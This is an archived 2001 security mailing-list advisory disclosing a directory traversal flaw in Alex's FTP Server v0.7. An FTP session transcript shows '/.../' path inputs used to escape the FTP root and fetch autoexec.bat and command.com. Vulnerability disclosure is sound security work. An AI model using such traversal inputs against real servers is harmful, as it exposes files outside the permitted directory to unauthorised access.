Vulnerabilities in Alex's FTP Server

From: joetestaat_private
Date: Sat Apr 28 2001 - 16:52:34 PDT

Next message: Aviram Jenik: "A Serious Security Vulnerability Found in BearShare (Directory Traversal)"

Previous message: ByteRage: "Winamp 2.6x / 2.7x buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

----- Begin Hush Signed Message from joetestaat_private -----

Vulnerabilities in Alex's FTP Server



    Overview

Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net.
Vulnerabilities exist which allow a user to break out of the ftp root.



    Details

The following is an illustration of the problem.  An ftp root of
'c:\directory\directory' was used:


Connected to xxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connection for retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" is current directory
ftp> get command.com
200 Port command okay
150 Opening data connection for retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
ftp>




    Solution

No quick fix is possible.



    Vendor Status

Alex Linde was contacted via <alex.lindeat_private> on
Friday, April 20, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
EQcZaZRY8qHbXEoNyX08XELi9dxKdjm2FqldEP7+Sl5CfDejO0PaPKe/uBYxHXEnkM2u
44EjodbwrUqAF7M64TA8mDMqpuUwx2NnDlCkvbLMMe5pbVUER/tFD2R4WdD/94j/vtU6
vLq31tg7Z3jKDgOasR3q9RUb9zsLWjN01FGjSwBQIy2pP+jBaK6Edt7O5oSU1OisSAbH
9IJF/nx9PovvNSqUqsmz/nbywYuN/CZTURgRfw584aKpidxKB+zrWrmq+wf/WzXxAooI
W3J7tpHQV2+Osu/f+w5HkS2yc2XWo6gcdAjOySGiA71OL18BLEF6avPFnKfUpFsE4NQ9
vVuYaI86jMyPlnJd2Rg9HYxxnU80Uu3s8ZLAIwLflbRqyDHk9P4Ivus5hQd0EDs5cjyE
ALYP9twX/Q86/5fz7qXFR/pJv6kmFr0eOKZdv1zOFES6eVYfdyJeLjhqbTa32BI/88l4
ywYMSBgRmg7W3eWWcs+FnGbzmMNX7sPUv9m5vIZjPtf/
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com

Next message: Aviram Jenik: "A Serious Security Vulnerability Found in BearShare (Directory Traversal)"
Previous message: ByteRage: "Winamp 2.6x / 2.7x buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 30 2001 - 00:18:54 PDT